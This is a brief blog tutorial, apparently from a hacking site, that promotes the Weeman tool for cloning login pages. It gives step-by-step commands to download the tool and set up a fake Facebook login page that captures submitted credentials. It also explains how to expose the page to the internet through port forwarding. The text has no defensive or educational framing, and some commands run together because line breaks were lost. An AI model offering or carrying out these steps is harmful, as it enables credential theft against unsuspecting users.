Weeman: Best Tool For Creating Phishing Pages
What is Weeman
Weeman is HTTP server written in python for creating phishing pages.
How Weeman Works
- Create fake html page.
- Wait for clients
- Grab the data (POST).
- Try to login the client to the original page
Things we need
- Any Linux operating system with Python 2.7 installed. In my case I am using Kali Linux 2.
- Internet Connection.
Follow the given tutorial
1. First we will download the Weeman tool, for this open your terminal and type the following commands
git clone https://github.com/Hypsurus/weeman2. Now change the directory to download weeman directory.
cd weeman3. Open weeman using following command
4. Now type the following commands to create the phishing page of the website.
set url http://www.facebook.comset port 8080set action_url http://www.facebook.comrun
here you can change http://www.facebook.com to any other site which you want to clone.
Example 192.168.2.13:8080You can also use your public ip to make it work on WAN or internet but you have to port forward your router.
Note:1. Make sure net is connected.
2. Python must be installed.
Weeman: Best Tool For Creating Phishing Pages Reviewed by Aditya Joshi on 07:48:00 Rating: